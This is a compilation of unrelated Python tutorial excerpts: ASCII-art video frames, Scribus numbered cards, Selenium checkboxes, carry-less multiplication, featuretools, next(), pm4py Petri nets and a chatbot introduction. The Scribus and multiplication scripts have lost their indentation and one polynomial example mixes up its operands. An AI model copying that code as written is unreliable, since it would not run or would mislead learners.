    drawl.text((0, 0), letter, (0, 0, 0), font=font)
    dat = list(imgl.getdata())
    ave = numpy.average(dat)
    LetterLuma[letter] = ave
LetterLuma[' '] = 255
LowID = 1    # number of the first frame
HighID = 2   # number of the last frame + 1
IDafx = 'k'  # frame filename prefix
fload = ''   # frame directory
QuickGuess = {}
for id in range(LowID, HighID):
    filename = fload + IDafx + str(id) + '.png'  # frames are assumed to be PNG
    img = Image.open(filename)
    img.load()
    img = img.convert("L")
    imgsize = img.size
    maxrow = math.floor(imgsize[1] / FontPxSize[1])
    maxcol = math.floor(imgsize[0] / FontPxSize[0])
    linesize = imgsize[1]
    pxwidth = FontPxSize[0]
    pxheight = FontPxSize[1]
    outputimg = Image.new('RGB', (maxcol * FontPxSize[0], maxrow * FontPxSize[1]), (255, 255, 255))
    outputdraw = ImageDraw.Draw(outputimg)
    for h in range(0, maxrow):
        RanderText = ''
        TextCache = []
        for w in range(0, maxcol):
            # compute the average grey level of this cell
            l = 0.0
            l = numpy.average(list((img.getpixel((x, y))
                                    for x in range(w * pxwidth, (w + 1) * pxwidth)
                                    for y in range(h * pxheight, (h + 1) * pxheight))))
            # l /= FontPxSize[0] * FontPxSize[1]
            bestguess = ' '
            if QuickGuess.get(int(l)) is None:
                for key in LetterLuma:
                    if abs(LetterLuma[bestguess] - l) > abs(LetterLuma[key] - l):
                        bestguess = key
                QuickGuess[int(l)] = bestguess
            else:
                bestguess = QuickGuess[int(l)]
            TextCache.append(bestguess)
        RanderText = RanderText.join(TextCache)
        outputdraw.text((0, h * pxheight), RanderText, (0, 0, 0), font=font)
    outputimg.save(fload + IDafx + 'MOD' + str(id) + '.png')
    img.close()
Finally, reassemble the frames with ffmpeg. On the command line:
ffmpeg -framerate FRAMERATE -i PICINPUT -codec copy FILMOUTPUT
FRAMERATE: the frame rate
PICINPUT: the input images
copy: the video codec, here "copy only" (can be replaced with h264)
FILMOUTPUT: the output video
To get this written quickly I didn't use getdata to dump the pixels into a list before averaging the grey level (dealing with the alignment is a pain), and that is one of the performance bottlenecks, because getpixel costs far more CPU time than numpy's average. Another likely bottleneck is disk I/O: the data flows from disk to memory (ffmpeg decoding), back to disk (saved as PNG), to memory (PNG decoding), back to disk (saved as PNG), to memory (ffmpeg encoding) and finally back to disk (saved as the video). Since I'm not sure whether there is a Python wrapper around ffmpeg, one option is to write a couple of C functions and glue them onto Python.
On an 8-core 3.2 GHz processor the demo runs at roughly 50 fps for the ffmpeg frame extraction, about 1 fps for the Python processing (multi-process), and about 300 fps for the ffmpeg re-encoding.
|
This script generates numbered cards, e.g. admission tickets. The code (also included in the attachment together with sample data):
Code: Select all
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import scribus
#################################
# Settings:
# Number of cards:
anzahl = 48
# Number of cards per page:
anzahl_pro_seite = 16
# Number of columns:
spalten = 2
# Offset of the right card from the left one, and of the lower one from the upper one
abstand_x = 90.89
abstand_y = 33.5975
# Paragraph style for the text box containing the number:
stil = "Nummer"
# Master page with the card layout:
musterseite = "Karten"
##################################
# Start of the script:
# Get information about the text frame:
x,y = scribus.getPosition()
breite, hoehe = scribus.getSize()
zaehler = int(scribus.getText())
anzahl_stellen = len(scribus.getText())
# Set up various variables...
anzahl_pro_spalte = anzahl_pro_seite / spalten
x_neu = x
y_neu = y + abstand_y
zaehler_seite = 0
zaehler_spalte = 1
while zaehler != anzahl:
while zaehler_seite < anzahl_pro_seite:
while zaehler_spalte < anzahl_pro_spalte:
zaehler = zaehler + 1
zaehler_spalte = zaehler_spalte + 1
rahmen = scribus.createText(x_neu, y_neu, breite, hoehe)
scribus.setText(str(zaehler).zfill(anzahl_stellen), rahmen)
scribus.setStyle(stil, rahmen)
y_neu = y_neu + abstand_y
if zaehler == anzahl:
break
if zaehler == anzahl:
break
x_neu = x_neu + abstand_x
y_neu = y
zaehler_seite = zaehler_seite + zaehler_spalte
zaehler_spalte = 0
if zaehler < anzahl:
zaehler_seite = 0
zaehler_spalte = 0
scribus.newPage(-1, musterseite)
scribus.gotoPage(scribus.pageCount())
y_neu = y
x_neu = x
Create the document: a paragraph style for the number called "Nummer" and a master page called "Karten" (the names can be changed in the script)
Adjust the script: in the first section, set the variables to the desired values
Run the script: fill the first text frame with the desired starting number and the desired number of digits, e.g. 00023, and select it (important!); only then run the script.
Save the document, export it, print it and cut the cards (ideally with a cutting device) ;-)
window) to equal vertical / horizontal spacing (in the warning that appears, choose to ignore locked objects)
License:
Regards
Julius
|
For more articles on Python Selenium, see my column:
Python Selenium Automated Testing in Detail
On web pages you sometimes run into checkboxes and radio buttons. Normally both are input tags, and we can select them either by clicking them or by sending a space key.
Test page code, checkandradio.html:
<html><body>Checkbox:<input type="checkbox" value="cv1" name="c1"><input type="checkbox" value="cv2"><input type="checkbox" value="cv3" name="c1"><input type="checkbox" value="cv4"><p>Radio:<input type="radio" value="rv1" name="r1"><input type="radio" value="rv2" name="r1"></body></html>
Locating them: they are ordinary input tags, so locate them in the usual way; no need to go into detail here.
Below we use Selenium to select checkboxes 1 and 2 and then radio 1 followed by radio 2. Here is the code:
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep
driver = webdriver.Firefox()
driver.maximize_window()
driver.get('file:///D:/checkboxandradio.html')
# checkbox
driver.find_element_by_xpath('//input[@value="cv1"]').click() # click
driver.find_element_by_xpath('//input[@value="cv2"]').send_keys(Keys.SPACE) # send space
# radio
driver.find_element_by_xpath('//input[@value="rv1"]').send_keys(Keys.SPACE) # send space
sleep(1)
driver.find_element_by_xpath('//input[@value="rv2"]').click() # click
sleep(1)
driver.quit()
As the example shows, for this kind of checkbox and radio button we can select (or deselect) them either by clicking directly or by sending a space key.
Checking whether a box is selected
element.is_selected()
Sample code:
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep
driver = webdriver.Firefox()
driver.maximize_window()
driver.get('file:///D:/checkboxandradio.html')
# checkbox
driver.find_element_by_xpath('//input[@value="cv1"]').click() # click
driver.find_element_by_xpath('//input[@value="cv2"]').send_keys(Keys.SPACE) # send space
if driver.find_element_by_xpath('//input[@value="cv2"]').is_selected():
    print('selected!')
else:
    print('not yet!')
# radio
driver.find_element_by_xpath('//input[@value="rv1"]').send_keys(Keys.SPACE) # send space
sleep(1)
driver.find_element_by_xpath('//input[@value="rv2"]').click() # click
if driver.find_element_by_xpath('//input[@value="rv1"]').is_selected():
    print('selected!')
else:
    print('not yet!')
sleep(1)
driver.quit()
Result:
selected!
not yet!
Of course, there are other ways to select an element and to check whether it is selected: simulating a mouse click, selecting via JavaScript, modifying the tag attributes, or checking the state with JS/jQuery or via the tag attributes. For most situations the methods above are enough. If they fail, consider reading or modifying the tag attribute directly, or look at other factors such as missing waits or the element being covered by another element, and keep experimenting.
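To make the JavaScript route mentioned above concrete, here is a minimal sketch; it reuses the test page and the old find_element_by_xpath locator from the examples, and reading the checked property via execute_script is an assumed way of verifying the state rather than something from the original text:
from selenium import webdriver

driver = webdriver.Firefox()
driver.get('file:///D:/checkboxandradio.html')
box = driver.find_element_by_xpath('//input[@value="cv3"]')
# click the element through JavaScript instead of the normal WebDriver click
driver.execute_script("arguments[0].click();", box)
# read the DOM property to verify the state (True/False); this check is an assumption, adjust as needed
print(driver.execute_script("return arguments[0].checked;", box))
driver.quit()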
|
Solution:
If it is a function, it needs to return something; otherwise calling it is of little use.
So you probably want to write:
def multiply(a, b):
return a * b
You may want to read more about functions in Python, and then this will make more sense (passing by reference, for example). This can be a good starting point: Python functions.
With the return value in place, the code will be OK:
def multiply(a, b):
return a * b
For example 111 x 101 gives:
111
x101
------
111
000
111
-----
11011
=====
We can represent 101 as x^2 + 1 and 110 as x^2 + x.
Next we multiply them together to give:
(x^2 + 1) × (x^2 + x)
= x^4 + x^3 + x^2 + x
which can be represented as 11110.
For example, if we work through the example on Page 6 [here] of 84 x 13 (where ** represents "to the power of"):
84x13 = ((2**6+ 2**4+ 2**2)x(2**3+ 2**2+ 2**0)) (mod 2)
= (2**9+ 2**8+ 2**7+ 2**6+ 2**6+ 2**5+ 2**4+ 2**4+ 2**2) (mod 2)
= (2**9+ 2**8+ 2**7+ 2**5+ 2**2) (mod 2)
which is 1110100100 [Calc]
The working out in its proper form is:
84x13 = ((2^6 + 2^4 + 2^2) × (2^3 + 2^2 + 2^0)) (mod 2)
= (2^9 + 2^8 + 2^6 + 2^7 + 2^6 + 2^4 + 2^5 + 2^4 + 2^2) (mod 2)
= (2^9 + 2^8 + 2^7 + 2^5 + 2^2) (mod 2)
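As a quick sanity check on the working above, carry-less (XOR) multiplication can be written very compactly with shifts and XOR. This is a minimal sketch, independent of the longer script below:
def clmul(a, b):
    """Carry-less (XOR) multiplication of two integers."""
    res = 0
    while b:
        if b & 1:      # if the lowest bit of b is set,
            res ^= a   # XOR in the shifted copy of a
        a <<= 1
        b >>= 1
    return res

print(bin(clmul(0b111, 0b101)))  # 0b11011
print(bin(clmul(84, 13)))        # 0b1110100100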
I have used a simple bit-shift operation and XOR to implement the method:
import struct
import sys
val1=1
val2=1
if (len(sys.argv)>1):
val1=str(sys.argv[1])
if (len(sys.argv)>2):
val2=str(sys.argv[2])
def reverse(text):
lst = []
count = 1
for i in range(0,len(text)):
lst.append(text[len(text)-count])
count += 1
lst = ''.join(lst)
return lst
def showpoly(a):
str1 = ""
nobits = len(a)
for x in range (0,nobits-2):
if (a[x] == '1'):
if (len(str1)==0):
str1 +="x**"+str(nobits-x-1)
else:
str1 +="+x**"+str(nobits-x-1)
if (a[nobits-2] == '1'):
if (len(str1)==0):
str1 +="x"
else:
str1 +="+x"
if (a[nobits-1] == '1'):
str1 +="+1"
print str1;
def multiply(a,b):
bit1 = int(a,2)
bit2 = int(b,2)
g = []
nobits = len(b)
print a.rjust(len(a)+len(b)-1)
str = "x"+b;
print str.rjust(len(a)+len(b)-1)
print "-" * (len(a)+len(b)-1)
b=reverse(b)
for i in range (0,nobits):
if (b[i]=='0'):
g.append(0)
else:
g.append(int((bit1<<i)))
print bin(g[i])[2:].rjust(len(a)+len(b)-1)
res=int(g[0])
for i in range (1,nobits):
res = int(res) ^ int(g[i])
print "-" * (len(a)+len(b)-1)
print bin(res)[2:].zfill(len(a)+len(b)-1)
print "=" * (len(a)+len(b)-1)
return res
print "Binary form:\t",val1,"x",val2
print "Decimal form:\t",int(val1,2),"x",int(val2,2)
print ""
showpoly(val1)
showpoly(val2)
print "\nWorking out:\n"
res=multiply(val1,val2)
print "\nResult: ",res
|
Model training in machine learning is becoming more and more automated, but feature engineering is still a long, manual process that relies on domain expertise, intuition and data manipulation. Feature construction is nonetheless a crucial early step in machine learning, even though, unlike model training, it does not produce directly usable results. In this article the author walks through an example of automated feature engineering with Python's featuretools library.
Machine learning is increasingly moving from hand-designed models to pipelines that are automatically optimized with tools such as H2O, TPOT and auto-sklearn. These libraries, together with methods such as random search, aim to simplify the model selection and tuning parts of machine learning by finding the best model for a dataset with almost no manual intervention. Feature engineering, however, is almost entirely manual, and it is arguably the more valuable part of the machine learning pipeline.
Feature engineering, also known as feature creation, is the process of building new features from existing data to train a machine learning model. This step can matter more than the actual model being applied, because a machine learning algorithm only learns from the data we give it, and creating features that are relevant to the task is absolutely critical.
Typically, feature engineering is a drawn-out manual process that relies on domain knowledge, intuition and data manipulation. The process can be extremely tedious, and the resulting features are limited by human subjectivity and by time. Automated feature engineering aims to help the data scientist by automatically creating many candidate features from a dataset, from which the best ones can be selected and used for training.
In this article we will walk through an example of automated feature engineering with Python's featuretools library, using a sample dataset to demonstrate the basics.
Full code:
https://github.com/WillKoehrsen/automated-feature-engineering/blob/master/walk_through/Automated_Feature_Engineering.ipynb
Feature engineering basics
Feature engineering means building additional features from existing data, which is often spread across multiple related tables. It requires extracting the relevant information from the data and putting it into a single table that can then be used to train a machine learning model.
The process of building features is very time-consuming, because each new feature usually takes several steps to construct, especially when it uses information from more than one table. We can group the operations of feature creation into two categories: transformations and aggregations. Let's look at a few examples to see these concepts in action.
A transformation acts on a single table (from a Python point of view, a table is just a Pandas DataFrame) by creating new features from one or more of its existing columns.
For example, if we have the clients table below,
we can create features by finding the month of the joined column or by taking the natural log of the income column. These are both transformations, because they use information from only one table.
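As an illustration of a transformation, the two features just mentioned can be built with plain Pandas. This is a minimal sketch that assumes a toy clients dataframe with joined (datetime) and income columns; the real dataset in the article is larger:
import numpy as np
import pandas as pd

# toy stand-in for the clients table used in the article
clients = pd.DataFrame({
    'client_id': [1, 2, 3],
    'joined': pd.to_datetime(['2015-03-01', '2016-07-15', '2017-01-30']),
    'income': [52000, 61000, 48000],
})
# transformations: both new columns use information from this single table only
clients['join_month'] = clients['joined'].dt.month
clients['log_income'] = np.log(clients['income'])
print(clients)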
import pandas as pd
# Group loans by client id and calculate mean, max, min of loans
stats = loans.groupby('client_id')['loan_amount'].agg(['mean', 'max', 'min'])
stats.columns = ['mean_loan_amount', 'max_loan_amount', 'min_loan_amount']
# Merge with the clients dataframe
stats = clients.merge(stats, left_on = 'client_id', right_index=True, how = 'left')
stats.head(10)
Aggregations, on the other hand, work across tables: they use a one-to-many relationship to group observations and then compute statistics. For example, if we have another table with information about clients' loans, where each client may have multiple loans, we can compute statistics such as the mean, maximum and minimum of each client's loans.
This process consists of grouping the loans table by client, computing the aggregations, and then merging the resulting data into the client data; the groupby snippet shown above is how we would do this in Python with the Pandas library.
These operations are not difficult in themselves, but if we have hundreds of variables spread across dozens of tables, the process cannot feasibly be done by hand. Ideally, we want a solution that automatically performs transformations and aggregations across multiple tables and merges the results into a single table. Although Pandas is a great resource, there is a limit to how much data manipulation we want to do manually.
More on manual feature engineering:
https://jakevdp.github.io/PythonDataScienceHandbook/05.04-feature-engineering.html
Featuretools
Fortunately, featuretools is exactly the solution we are looking for. This open-source Python library automatically creates many features from a set of related tables. Featuretools is based on a method known as "deep feature synthesis", a name that sounds far more impressive than what it actually does.
Deep feature synthesis stacks multiple transformation and aggregation operations (called feature primitives in featuretools vocabulary) to create features from data spread across many tables. Like most ideas in machine learning, it is a composite method built on simple concepts. By learning one building block at a time, we can get a good understanding of this powerful method.
First, let's take a look at our example data. We have already seen some of the dataset above; the full collection of tables is as follows:
clients: basic information about clients of a credit union. Each client has only one row in this dataframe.
loans: loans made to clients. Each loan has its own row in this dataframe, but a client may have multiple loans.
payments: payments made on loans. Each payment has only one row, but each loan has multiple payments.
If we have a machine learning task, such as predicting whether a client will repay a future loan, we will want to combine all the information about that client into a single table. The tables are related (through the client_id and loan_id variables), and for now we could do the series of transformations and aggregations by hand. Shortly, however, we will be able to automate the process with featuretools.
Entities and EntitySets
The first two concepts in featuretools are entities and entitysets. An entity is simply a table (in Pandas terms, an entity is a DataFrame).
An EntitySet is a collection of tables together with the relationships between them. Think of an entityset as just another Python data structure, with its own methods and attributes.
We can create an empty entityset in featuretools with the following command:
import featuretools as ft
# Create new entityset
es = ft.EntitySet(id = 'clients')
Now we add the entities. Every entity must have an index, which is a column whose elements are all unique; that is, each value in the index can appear only once in the table.
The index of the clients dataframe is client_id, because each client has only one row in this dataframe. We add an entity that already has an index to an entityset with the following syntax:
# Create an entity from the client dataframe
# This dataframe already has an index and a time index
es = es.entity_from_dataframe(entity_id = 'clients', dataframe = clients, index = 'client_id', time_index = 'joined')
The loans dataframe also has a unique index, loan_id, and the syntax for adding it to the entityset is the same as for clients. For the payments dataframe, however, there is no unique index. When we add this entity to the entityset we need to pass the parameter make_index = True and specify a name for the index. In addition, although featuretools automatically infers the data type of each column of an entity, we can override this by passing a dictionary of column types to the variable_types parameter.
# Create an entity from the payments dataframe
# This does not yet have a unique index
es = es.entity_from_dataframe(entity_id = 'payments',
dataframe = payments,
variable_types = {'missed': ft.variable_types.Categorical},
make_index = True,
index = 'payment_id',
time_index = 'payment_date')
For this dataframe, even though missed is an integer, it is not a numeric variable, since it can only take 2 discrete values, so we tell featuretools to treat missed as a categorical variable. After adding the dataframes to the entityset, we can inspect any of them:
With the modification we specified, the column types are inferred correctly. Next, we need to specify how the tables in the entityset are related.
Relationships between tables
The best way to think about the relationship between two tables is the analogy of parent to child. Parent to child is a one-to-many relationship: each parent can have multiple children. In table terms, each row of the parent table represents a distinct parent, while multiple rows of the child table can map back to the same parent in the parent table.
For example, in our dataset the clients dataframe is the parent of the loans dataframe, because each client has only one row in clients but may have multiple loans.
Likewise, loans is the parent of payments, because each loan has multiple payments. The parent table is linked to the child table through a shared variable. When we perform an aggregation, we group the child table by the parent variable and compute statistics over each parent's children.
To formalize a relationship in featuretools, we only need to specify the variable that links the two tables together.
The clients table and the loans table are linked by the client_id variable, and the loans and payments tables are linked by loan_id. The syntax for creating a relationship and adding it to the entityset is:
# Relationship between clients and previous loans
r_client_previous = ft.Relationship(es['clients']['client_id'],
es['loans']['client_id'])
# Add the relationship to the entity set
es = es.add_relationship(r_client_previous)
# Relationship between previous loans and previous payments
r_payments = ft.Relationship(es['loans']['loan_id'],
es['payments']['loan_id'])
# Add the relationship to the entity set
es = es.add_relationship(r_payments)
es
Now the entityset contains the three tables and the relationships between them. After adding the entities and formalizing the relationships, the entityset is complete and we can start making features.
Feature primitives
Before we fully dive into deep feature synthesis, we need to understand feature primitives. We already know what these are, we have just been calling them by different names! They are simply the basic operations we use to form new features:
Aggregations: operations completed across the parent-to-child (one-to-many) relationship that group by the parent and compute statistics over the children. An example is grouping the loans table by client_id and finding the maximum loan amount for each client.
Transformations: operations applied to one or more columns of a single table. An example is taking the difference between two columns in one table, or taking the absolute value of a column.
New features are created in featuretools using these primitives, either on their own or by stacking multiple primitives. Below is a list of some of the feature primitives in featuretools (we can also define custom primitives):
These primitives can be used by themselves or combined to create features. To make features with specified primitives we use the ft.dfs function (which stands for deep feature synthesis). We pass in the entityset, the target_entity (the table we want to add the features to), the chosen trans_primitives (transformations) and agg_primitives (aggregations):
# Create new features using specified primitives
features, feature_names = ft.dfs(entityset = es, target_entity = 'clients',
agg_primitives = ['mean', 'max', 'percent_true', 'last'],
trans_primitives = ['years', 'month', 'subtract', 'divide'])
The result is a dataframe of new features for each client (because we made clients the target_entity). For example, we have the month each client joined, which is a feature generated by a transformation primitive:
We also have a number of aggregation primitives, such as the mean payment amount for each client:
Even though we specified only a few feature primitives, featuretools created many new features by combining and stacking these primitives.
Deep feature synthesis
We are now ready to understand deep feature synthesis (dfs). In fact, we already performed dfs in the previous function call! A deep feature is simply a feature made by stacking multiple primitives, and dfs is the name of the process that makes these features. The depth of a deep feature is the number of primitives needed to make it.
For example, the MEAN(payments.payment_amount) column is a deep feature with a depth of 1, because it is created with a single aggregation. A feature with a depth of two is LAST(loans.(MEAN(payments.payment_amount))), made by stacking two aggregations: LAST (most recent) on top of MEAN. This represents the average payment amount of each client's most recent loan.
We can stack features to any depth we want, but in practice I have never gone beyond a depth of 2. Past this point the features are hard to interpret, but I encourage anyone interested to try "going deeper".
Instead of specifying the feature primitives by hand, we can let featuretools automatically choose features for us. We use the same ft.dfs function call but do not pass in any feature primitives:
# Perform deep feature synthesis without specifying primitives
features, feature_names = ft.dfs(entityset=es, target_entity='clients',
max_depth = 2)
features.head()
Featuretools has built many new features for us. While this process automatically creates new features, it is still up to the data scientist to figure out what to do with them all. For example, if our goal is to predict whether a client will repay a loan, we could look for the features most correlated with that outcome. Moreover, if we have domain knowledge, we can use it to choose specific feature primitives or to seed deep feature synthesis with candidate features.
Next steps
Automated feature engineering solves one problem but creates another: too many features. Although it is hard to say which features matter before fitting a model, it is likely that not all of them are relevant to the task we want to train the model on. Moreover, too many features can hurt model performance, because the less useful features drown out those that are more important.
The problem of too many features is known as the curse of dimensionality. As the number of features (the dimensionality of the data) grows, it becomes harder and harder for a model to learn the mapping between features and target. In fact, the amount of data the model needs to perform well grows exponentially with the number of features.
The counterpart of the curse of dimensionality is feature reduction, also called feature selection: the process of removing irrelevant features. It can take many forms: principal component analysis (PCA), SelectKBest, using a model's feature importances, or auto-encoding with deep neural networks. However, feature reduction is a topic for another article. For now, we know that featuretools lets us create many features from many tables with minimal effort!
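As a small illustration of the feature-selection step mentioned above, scikit-learn's SelectKBest keeps only the k highest-scoring features. This is a minimal sketch with synthetic data standing in for the generated feature matrix and the target:
import numpy as np
import pandas as pd
from sklearn.feature_selection import SelectKBest, f_classif

# synthetic stand-ins for the generated feature matrix and a binary target
rng = np.random.RandomState(0)
X = pd.DataFrame(rng.randn(100, 30), columns=[f"feat_{i}" for i in range(30)])
y = rng.randint(0, 2, size=100)
# keep only the 5 features with the highest ANOVA F-scores
selector = SelectKBest(score_func=f_classif, k=5)
X_reduced = selector.fit_transform(X, y)
print(X.columns[selector.get_support()])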
Conclusion
Like many topics in machine learning, automated feature engineering with featuretools is a complicated concept built on simple ideas. Using the concepts of entitysets, entities and relationships, featuretools can perform deep feature synthesis to create new features.
Deep feature synthesis stacks feature primitives in turn: aggregations, which exploit the one-to-many relationships across tables, and transformations, which are functions applied to one or more columns of a single table, in order to build new features from multiple tables.
In a later article I will show how to use this technique on a real-world problem, the Home Credit Default Risk competition currently hosted on Kaggle. Stay tuned for that post, and in the meantime read this introduction to get started in the competition! I hope you can now use automated feature engineering as an aid in your data science pipeline. A model's performance is determined by the data we give it, and automated feature engineering can help make feature creation more efficient.
有关featuretools的更多信息,包括高级用法,请查看在线文档:
https://docs.featuretools.com
To see how featuretools is used in practice, read about the work of Feature Labs, the company behind the open-source library:
https://www.featurelabs.com
|
In this guide, we are going to show you what the Python next() function is and how to use it to get the next item of an iterable.
To follow the examples, you should have basic knowledge of the Python iter() function, which is used to get an iterator object.
Python next function
The Python next function is a built-in function used to get the next item of an iterator. You can pass a default value to be returned once the iterator reaches the end.
Syntax
The syntax of the next function in Python is:
next(iterable, default)
Parameters
The next function in Python accepts two parameters.
iterable:- Required. An iterator object
default:- Optional. A default value to return if the iterator has reached the end.
Return Value
The return value of the next function in Python is the next item of the iterator.
Python next example
Here we will look at some examples to understand the next function in Python.
Example 1:
#List iterable
my_iterable = ['Python', 'C#', 'Java', 'PHP', 'Ruby']
#Create iterator object.
iter_object = iter(my_iterable)
print(next(iter_object))
print(next(iter_object))
print(next(iter_object))
print(next(iter_object))
print(next(iter_object))
Output
Python
C#
Java
PHP
Ruby
Example 2:
#List iterable
my_iterable = ['Python', 'C#', 'Java', 'PHP', 'Ruby']
#Create iterator object.
iter_object = iter(my_iterable)
for i in range(len(my_iterable)):
print(next(iter_object))
Output
Python
C#
Java
PHP
Ruby
Example 3:
Here we will use the next function with a default value.
#List iterable
my_iterable = ['Python', 'C#', 'Java', 'PHP', 'Ruby']
#Create iterator object.
iter_object = iter(my_iterable)
for i in range(len(my_iterable) + 1):
print(next(iter_object, 'HTML'))
output
Python
C#
Java
PHP
Ruby
HTML
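One more behaviour worth knowing: if the iterator is exhausted and no default is given, next() raises StopIteration. A small sketch:
my_iterable = ['Python', 'C#']
iter_object = iter(my_iterable)
print(next(iter_object))   # Python
print(next(iter_object))   # C#
try:
    print(next(iter_object))   # no default given, so this raises StopIteration
except StopIteration:
    print('Iterator is exhausted')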
Conclusion
In this article, you have learned all about using the Python next() function to get the next item of an iterable.
To understand the next function, you should also know the Python iter() function.
If you like this article, please share it and keep visiting for more Python built-in function tutorials.
Python built-in functions
For more information:- Click Here
|
Petri nets are one of the most common formalism to express a process model. A Petri net is a directed bipartite graph, in which the nodes represent transitions and places. Arcs are connecting places to transitions and transitions to places, and have an associated weight. A transition can fire if each of its input places contains a number of tokens that is at least equal to the weight of the arc connecting the place to the transition. When a transition is fired, then tokens are removed from the input places according to the weight of the input arc, and are added to the output places according to the weight of the output arc.
A marking is a state in the Petri net that associates each place to a number of tokens and is uniquely associated to a set of enabled transitions that could be fired according to the marking.
Process discovery algorithms implemented in pm4py return a Petri net along with an initial marking and a final marking. An initial marking is the initial state of execution of a process; a final marking is a state that should be reached at the end of the execution of the process.
Importing and exporting
Petri nets, along with their initial and final marking, can be imported/exported from the PNML file format. The following code can be used to import a Petri net along with its initial and final marking. In particular, the Petri net related to the running-example process is loaded from the test folder:
import os
from pm4py.objects.petri.importer import pnml as pnml_importer
net, initial_marking, final_marking = pnml_importer.import_net(os.path.join("tests", "input_data", "running-example.pnml"))
The Petri net is visualized using the Petri net visualizer:
from pm4py.visualization.petrinet import factory as pn_vis_factory
gviz = pn_vis_factory.apply(net, initial_marking, final_marking)
pn_vis_factory.view(gviz)
A Petri net can be exported along with only its initial marking:
from pm4py.objects.petri.exporter import pnml as pnml_exporter
pnml_exporter.export_net(net, initial_marking, "petri.pnml")
And along with both its initial marking and final marking:
pnml_exporter.export_net(net, initial_marking, "petri_final.pnml", final_marking=final_marking)
Petri Net properties
The list of transitions enabled in a particular marking can be obtained using the following code:
from pm4py.objects.petri import semantics
transitions = semantics.enabled_transitions(net, initial_marking)
Calling print(transitions) reports that only the transition register request is enabled in the initial marking of the given Petri net. To obtain all places, transitions, and arcs of the Petri net, the following code can be used:
places = net.places
transitions = net.transitions
arcs = net.arcs
Each place has a name and a set of input/output arcs (connected at source/target to a transition). Each transition has a name and a label and a set of input/output arcs (connected at source/target to a place). The following code prints for each place the name, and for each input arc of the place the name and the label of the corresponding transition:
for place in places:
    print("\nPLACE: " + place.name)
    for arc in place.in_arcs:
        print(arc.source.name, arc.source.label)
The output starts with the following:
PLACE: sink 47
n10 register request
n16 reinitiate request

PLACE: source 45
...
Similarly, the following code prints for each transition the name and the label, and for each output arc of the transition the name of the corresponding place:
for trans in transitions:
    print("\nTRANS: ", trans.name, trans.label)
    for arc in trans.out_arcs:
        print(arc.target.name)
For the running example the output starts with the following:
TRANS: n14 examine thoroughly
sink 54

TRANS: n15 decide
middle 49
...
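Once a marking and the enabled transitions are known, a transition can also be fired to obtain the marking that follows it. A minimal sketch, assuming the execute helper in the same pm4py.objects.petri.semantics module used above (check the exact name in your pm4py version):
from pm4py.objects.petri import semantics

marking = initial_marking
enabled = semantics.enabled_transitions(net, marking)
if enabled:
    trans = list(enabled)[0]
    # 'execute' is assumed to fire the transition and return the new marking
    marking = semantics.execute(trans, net, marking)
    print(marking)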
Creating a new Petri net
In this section, an overview of the code necessary to create a new Petri net with places, transitions, and arcs is provided. A Petri net object in pm4py should be created with a name. For example, this creates a Petri net with name new_petri_net
# creating an empty Petri net
from pm4py.objects.petri.petrinet import PetriNet, Marking
net = PetriNet("new_petri_net")
Also places need to be named upon their creation:
# creating source, p_1 and sink place
source = PetriNet.Place("source")
sink = PetriNet.Place("sink")
p_1 = PetriNet.Place("p_1")
To be part of the Petri net they are added to it:
net.places.add(source)
net.places.add(sink)
net.places.add(p_1)
Similar to the places, transitions can be created. However, they need to be assigned a name and a label:
t_1 = PetriNet.Transition("name_1", "label_1")
t_2 = PetriNet.Transition("name_2", "label_2")
They should also be added to the Petri net:
net.transitions.add(t_1)
net.transitions.add(t_2)
The following code is useful to add arcs in the Petri net. Arcs can go from place to transition or from transition to place. The first parameter specifies the starting point of the arc, the second parameter its target and the last parameter states the Petri net it belongs to.
from pm4py.objects.petri import utils
utils.add_arc_from_to(source, t_1, net)
utils.add_arc_from_to(t_1, p_1, net)
utils.add_arc_from_to(p_1, t_2, net)
utils.add_arc_from_to(t_2, sink, net)
To complete the Petri net an initial and possibly a final marking need to be defined. In the following, we define the initial marking to contain 1 token in the source place and the final marking to contain 1 token in the sink place:
from pm4py.objects.petri.petrinet import Marking
initial_marking = Marking()
initial_marking[source] = 1
final_marking = Marking()
final_marking[sink] = 1
The resulting Petri net along with the initial and final marking could be exported:
from pm4py.objects.petri.exporter import pnml as pnml_exporter
pnml_exporter.export_net(net, initial_marking, "createdPetriNet1.pnml", final_marking=final_marking)
Or visualized:
from pm4py.visualization.petrinet import factory as pn_vis_factory
gviz = pn_vis_factory.apply(net, initial_marking, final_marking)
pn_vis_factory.view(gviz)
To obtain a specific output format (e.g. svg or png) a format parameter should be provided to the algorithm. The following code explains how to obtain an SVG representation of the Petri net:
from pm4py.visualization.petrinet import factory as pn_vis_factory
parameters = {"format": "svg"}
gviz = pn_vis_factory.apply(net, initial_marking, final_marking, parameters=parameters)
pn_vis_factory.view(gviz)
Instead of opening visualization of the model directly it can also be saved using the following code:
from pm4py.visualization.petrinet import factory as pn_vis_factory
parameters = {"format": "svg"}
gviz = pn_vis_factory.apply(net, initial_marking, final_marking, parameters=parameters)
pn_vis_factory.save(gviz, "alpha.svg")
|
This trading bot automatically trades on the EXMO exchange at the edges of the order book with a given spread. The bot's main purpose is to familiarise users…
A few years ago an interview was published that discusses artificial intelligence and, in particular, chatbots. The interviewee stresses that chatbots do not converse, they imitate conversation.
They contain a core of sensible micro-dialogues of quite human quality, plus a conversational algorithm that constantly steers the conversation back to that core. That is all there is to it.
In my opinion, there is something to that…
Nevertheless, chatbots are much discussed on Habr. They come in many flavours. Bots based on predictive neural networks, which generate the answer word by word, are popular. That is very interesting but expensive to implement, especially for Russian with its large number of word forms. I chose a different approach for the chatbot Boltoon.
Boltoon works by picking the semantically closest answer from a supplied database and then post-processing it. This approach has several advantages:
It is fast;
The chatbot can be used for different tasks; to switch, you just load a new database;
The bot needs no retraining after the database is updated.
How does it work?
There is a database of questions and the answers to them.
The bot has to recognise the meaning of the phrases it receives and find similar ones in the database. For example, "how are you?", "how are things?" and "how's it going?" mean the same thing. Since a computer works well with numbers rather than letters, matching the entered phrase against the stored ones has to be reduced to comparing numbers. We need to turn the whole question column of the database into numbers, or rather into vectors of N real numbers. Every document then gets coordinates in an N-dimensional space. Such a space is hard to picture, but we can reduce the dimensionality to 2 for illustration.
In the same space we find the coordinate of the phrase entered by the user, compare it with the stored ones using the cosine metric, and take the nearest one. Boltoon is based on this simple idea.
